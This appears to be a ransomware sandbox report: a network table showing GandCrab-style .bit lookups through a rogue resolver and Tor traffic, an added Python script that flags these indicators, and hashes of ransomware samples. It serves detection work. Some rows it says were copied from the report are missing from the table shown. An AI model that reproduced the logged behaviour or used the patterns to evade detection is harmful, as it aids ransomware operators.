US 8.8.8.8:53 gandcrab.bit udp
GB 88.221.135.24:80 www.bing.com tcp
GB 88.221.135.24:80 www.bing.com tcp
US 8.8.8.8:53 r.bing.com udp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
US 8.8.8.8:53 219.143.101.95.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:8668 tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
GB 95.101.143.219:443 r.bing.com tcp
US 8.8.8.8:53 assets.msn.com udp
GB 95.101.143.98:443 assets.msn.com tcp
US 8.8.8.8:53 login.microsoftonline.com udp
NL 40.126.32.68:443 login.microsoftonline.com tcp
GB 173.222.211.40:443 aefd.nelreports.net tcp
N/A 127.0.0.1:8668 tcp
GB 173.222.211.40:443 aefd.nelreports.net tcp
US 8.8.8.8:53 98.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 65.49.8.96:443 tcp
US 8.8.8.8:53 200.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 40.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 www.msn.com udp
US 8.8.8.8:53 c.msn.com udp
IE 13.74.129.1:443 c.msn.com tcp
US 8.8.8.8:53 browser.events.data.msn.com udp
US 8.8.8.8:53 c.bing.com udp
GB 95.101.143.98:443 assets.msn.com tcp
US 52.168.117.170:443 browser.events.data.msn.com tcp
US 52.168.117.170:443 browser.events.data.msn.com tcp
US 204.79.197.237:443 c.bing.com tcp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 img-s-msn-com.akamaized.net udp
GB 173.222.211.43:443 img-s-msn-com.akamaized.net tcp
GB 173.222.211.43:443 img-s-msn-com.akamaized.net tcp
GB 173.222.211.43:443 img-s-msn-com.akamaized.net tcp
GB 173.222.211.43:443 img-s-msn-com.akamaized.net tcp
US 8.8.8.8:53 1.129.74.13.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 43.211.222.173.in-addr.arpa udp
N/A 127.0.0.1:8668 tcp
GB 88.221.134.3:443 th.bing.com tcp
US 8.8.8.8:53 3.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 services.bingapis.com udp
N/A 127.0.0.1:8668 tcp
US 13.107.5.80:443 services.bingapis.com tcp
US 8.8.8.8:53 www.torproject.org udp
DE 116.202.120.165:443 www.torproject.org tcp
DE 116.202.120.165:443 www.torproject.org tcp
US 8.8.8.8:53 80.5.107.13.in-addr.arpa udp
US 8.8.8.8:53 165.120.202.116.in-addr.arpa udp
DE 116.202.120.165:443 www.torproject.org tcp
DE 116.202.120.165:443 www.torproject.org tcp
DE 116.202.120.165:443 www.torproject.org tcp
DE 116.202.120.165:443 www.torproject.org tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 dist.torproject.org udp
US 204.8.99.144:443 dist.torproject.org tcp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 144.99.8.204.in-addr.arpa udp
NL 204.137.14.106:443 tcp
DE 193.23.244.244:80 193.23.244.244 tcp
US 216.218.219.41:80 216.218.219.41 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 52.168.117.173:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 106.14.137.204.in-addr.arpa udp
US 8.8.8.8:53 173.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
US 65.49.8.96:443 tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
N/A 127.0.0.1:8668 tcp
N/A 127.0.0.1:8668 tcp
DE 116.202.120.165:443 dist.torproject.org tcp
DE 116.202.120.165:443 dist.torproject.org tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 204.8.99.144:443 dist.torproject.org tcp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 94.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 65.49.8.96:443 tcp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad.onion udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 google.com udp
KR 180.80.144.44:9001 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
N/A 127.0.0.1:8668 tcp
DE 193.23.244.244:80 193.23.244.244 tcp
US 8.8.8.8:53 44.144.80.180.in-addr.arpa udp
US 216.218.219.41:80 216.218.219.41 tcp
N/A 127.0.0.1:8668 tcp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 8.8.8.8:53 nomoreransom.bit udp
US 65.49.8.96:443 tcp
N/A 127.0.0.1:8668 tcp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
US 8.8.8.8:53 emsisoft.bit udp
N/A 127.0.0.1:8668 tcp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 gandcrab.bit udp
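
The process list and the network table above carry three detection points worth turning into a check: nslookup.exe resolving the Namecoin names gandcrab.bit, nomoreransom.bit and emsisoft.bit through an explicitly named resolver (dns1.soprodns.ru), which is needed because .bit is not in the ICANN root and ordinary resolvers return nothing for it; an .onion name (the avosjon4...onion query) reaching the public resolver 8.8.8.8, which should never happen when Tor is used correctly; and Tor bootstrap traffic (torproject.org downloads, TCP to 9001 and 9131). The block below is an added example, not part of the sandbox report: it runs that logic over process-creation events and network rows in the same shape as the listings above. TOR_PORTS, IP_CHECK_HOSTS and APPROVED_RESOLVERS are assumptions for the example; the sample inputs are constructed from rows copied out of the report.

```python
"""Triage heuristics over sandbox-style process and network events.
Added example; the constants below are assumptions, not report data."""
from collections import Counter
from dataclasses import dataclass

# 9001/9030 are Tor's default ORPort/DirPort and 9131 is a directory
# authority DirPort; a hit means "looks like Tor", not proof of Tor.
TOR_PORTS = {9001, 9030, 9131}
TOR_DOWNLOAD_HOSTS = {"www.torproject.org", "dist.torproject.org"}
# Illustrative set of external-IP lookup services.
IP_CHECK_HOSTS = {"ipv4bot.whatismyipaddress.com", "api.ipify.org", "icanhazip.com"}
# Hypothetical: resolvers this environment may query directly.
APPROVED_RESOLVERS = {"8.8.8.8", "8.8.4.4"}


@dataclass(frozen=True)
class Finding:
    rule: str
    evidence: str


def check_process(image: str, cmdline: str) -> list[Finding]:
    """Process-creation check: nslookup of a .bit name and/or an explicit
    resolver argument that is not on the approved list."""
    findings: list[Finding] = []
    if not image.lower().endswith("\\nslookup.exe"):
        return findings
    args = cmdline.split()[1:]          # nslookup <name> [server]
    if not args:
        return findings
    if args[0].lower().endswith(".bit"):
        findings.append(Finding("bit_tld_lookup", cmdline))
    if len(args) > 1 and args[1].lower() not in APPROVED_RESOLVERS:
        findings.append(Finding("unapproved_resolver", cmdline))
    return findings


def parse_network_row(row: str):
    """Parse one 'Country Destination Domain Proto' row; Domain may be empty."""
    t = row.split()
    if len(t) not in (3, 4):
        raise ValueError(f"unexpected row: {row!r}")
    ip, port = t[1].rsplit(":", 1)
    domain = t[2].lower() if len(t) == 4 else None
    return t[0], ip, int(port), domain, t[-1].lower()


def check_network_row(row: str) -> list[Finding]:
    """Network check: .bit queries, .onion names leaking to a clearnet
    resolver, external-IP checks, Tor downloads and Tor-port connections."""
    _country, ip, port, domain, proto = parse_network_row(row)
    findings: list[Finding] = []
    if domain and domain.endswith(".bit"):
        findings.append(Finding("bit_tld_query", row))
    elif domain and domain.endswith(".onion"):
        # A .onion name is only meaningful inside Tor; seeing it at a
        # public resolver means something resolved it outside Tor.
        findings.append(Finding("onion_dns_leak", row))
    elif domain in IP_CHECK_HOSTS:
        findings.append(Finding("external_ip_check", row))
    elif domain in TOR_DOWNLOAD_HOSTS:
        findings.append(Finding("tor_download", row))
    elif proto == "tcp" and port in TOR_PORTS and ip != "127.0.0.1":
        findings.append(Finding("tor_port_connect", row))
    return findings


def triage(processes, network_rows) -> list[Finding]:
    findings: list[Finding] = []
    for image, cmdline in processes:
        findings.extend(check_process(image, cmdline))
    for row in network_rows:
        findings.extend(check_network_row(row))
    return findings


def summarize(findings) -> dict[str, int]:
    return dict(Counter(f.rule for f in findings))


# Constructed sample input: process launches and network rows taken from
# the report listings above (a benign CompPkgSrv launch and a bing.com row
# are included as negatives).
SAMPLE_PROCESSES = [
    (r"C:\Windows\SysWOW64\nslookup.exe", "nslookup emsisoft.bit dns1.soprodns.ru"),
    (r"C:\Windows\SysWOW64\nslookup.exe", "nslookup gandcrab.bit dns1.soprodns.ru"),
    (r"C:\Windows\SysWOW64\nslookup.exe", "nslookup nomoreransom.bit dns1.soprodns.ru"),
    (r"C:\Windows\System32\CompPkgSrv.exe", r"C:\Windows\System32\CompPkgSrv.exe -Embedding"),
]
SAMPLE_NETWORK = """\
US 8.8.8.8:53 dns1.soprodns.ru udp
US 8.8.8.8:53 gandcrab.bit udp
US 8.8.8.8:53 ipv4bot.whatismyipaddress.com udp
US 128.31.0.39:9131 128.31.0.39 tcp
DE 5.189.155.39:9001 tcp
N/A 127.0.0.1:8668 tcp
US 8.8.8.8:53 www.torproject.org udp
DE 116.202.120.165:443 dist.torproject.org tcp
US 8.8.8.8:53 avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad.onion udp
GB 88.221.135.24:443 www.bing.com tcp
""".splitlines()

if __name__ == "__main__":
    for f in triage(SAMPLE_PROCESSES, SAMPLE_NETWORK):
        print(f"{f.rule:20} {f.evidence}")
    print(summarize(triage(SAMPLE_PROCESSES, SAMPLE_NETWORK)))
```

On the sample above the three nslookup launches each trip both process rules, the .bit, .onion, IP-check and torproject rows trip one rule each, and the two connections to 9131 and 9001 are reported as Tor-port connections; the repeated 127.0.0.1:8668 connections are deliberately not attributed to anything, since the report does not say what listens there.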

Files

memory/3036-128-0x000001C0E7380000-0x000001C0E7381000-memory.dmp

memory/3036-129-0x000001C0E7380000-0x000001C0E7381000-memory.dmp

memory/3036-130-0x000001C0E7380000-0x000001C0E7381000-memory.dmp

memory/3036-135-0x000001C0E7380000-0x000001C0E7381000-memory.dmp

memory/3036-140-0x000001C0E7380000-0x000001C0E7381000-memory.dmp

memory/3036-139-0x000001C0E7380000-0x000001C0E7381000-memory.dmp

memory/3036-138-0x000001C0E7380000-0x000001C0E7381000-memory.dmp

memory/3036-137-0x000001C0E7380000-0x000001C0E7381000-memory.dmp

memory/3036-136-0x000001C0E7380000-0x000001C0E7381000-memory.dmp

memory/3036-134-0x000001C0E7380000-0x000001C0E7381000-memory.dmp

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val

MD5 6bd369f7c74a28194c991ed1404da30f
SHA1 0f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256 878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA512 8fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.idx

MD5 d2fb266b97caff2086bf0fa74eddb6b2
SHA1 2f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256 b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512 c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8

C:\Users\Admin\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.lock

MD5 f49655f856acb8884cc0ace29216f511
SHA1 cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA256 7852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512 599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8

memory/2356-157-0x000001D83C860000-0x000001D83C882000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w013rfqk.5rt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2356-167-0x000001D83D7D0000-0x000001D83D814000-memory.dmp

memory/2356-168-0x000001D83D8A0000-0x000001D83D916000-memory.dmp

C:\Users\Admin\Desktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277.exe

MD5 3f37958d8846628731b5e49d2c525bd9
SHA1 d8e48e6d355c62a76dfa557c86efbe0cca9133dc
SHA256 40a1c3ab6869ce4fc5237f521cae6d9dd97287627c9283d6b5bcbf02b946b277
SHA512 880ffadae42902ba36d4536f04ba11aff7041972e00f7e6c370a72bacfe1e6ded220da739900b707a557de049d53a4013344560eb6d199e5dcb3bd998ff2c8d3

C:\Users\Admin\Desktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-7298275ad4bcdad520077fb9464e9777591522c840d76e9fc3a34aa17b4403b2.exe

MD5 3af5a7b50dd8f9fa3fa858f445623c39
SHA1 0d0deb521578ec8618111257615108acf109b4fa
SHA256 7298275ad4bcdad520077fb9464e9777591522c840d76e9fc3a34aa17b4403b2
SHA512 0630f2d4c6f40bf4cea157d877a2e54a6ef4c5fae3ca1d9e63d219aab30566ad8071f0f03b01c936cd05eb25f348e5eb494e599d3c68bca1ec52ac76f753319a

C:\Users\Admin\Desktop\00476\HEUR-Trojan-Ransom.MSIL.Agent.gen-d43d393a57eba94438dc27c4a06940ff705d6cfc3327ee3a45480797b7f40b63.exe

MD5 665aab2ffae2eeeee8eb847e9bb69ebc
SHA1 8864a2662cbc6b09a557109111bd8b7d59d32b02
SHA256 d43d393a57eba94438dc27c4a06940ff705d6cfc3327ee3a45480797b7f40b63
SHA512 db56810f077a1a2fa8e41420c85e4b17287d4cf5616a4d8f59a2d2cb3e5cbb5becc28b4a956f13b1c13446c878d506154aa3db1df1f942dbe22704c9420ce9c5

C:\Users\Admin\Desktop\00476\HEUR-Trojan-Ransom.MSIL.Blocker.gen-5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766.exe

MD5 d962d419315bba0ebc87e52ac07525f7
SHA1 6a42f7b6bde962cb6c091855de71ea5009252e59
SHA256 5c500d5168113c41bb7816036f3241446f1d0d869cedf78ce1442939db113766
SHA512 53ebca83801b71e10832e87e203d1588f581fd3313b4d5070fb8c7ddb7361e6abd9620ba2624b689e5fc5f1c0c12ac1adf090bbe13327851f8a25f668722615f

memory/3396-183-0x0000000000040000-0x000000000005A000-memory.dmp

memory/3396-186-0x0000000004EA0000-0x0000000005444000-memory.dmp

memory/3396-188-0x0000000004990000-0x0000000004A22000-memory.dmp

C:\Users\Admin\Desktop\00476\HEUR-Trojan-Ransom.MSIL.Encoder.gen-cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366.exe

MD5 c3e3c86fde3bcd274d6ab8b34b317dcd
SHA1 3b8b97d4859df70429f616dda2ff97fc3100860d
SHA256 cc58ef77008f989fa8ccdb4d489be6633c4c2cace8f800dbdb6397b6a90b2366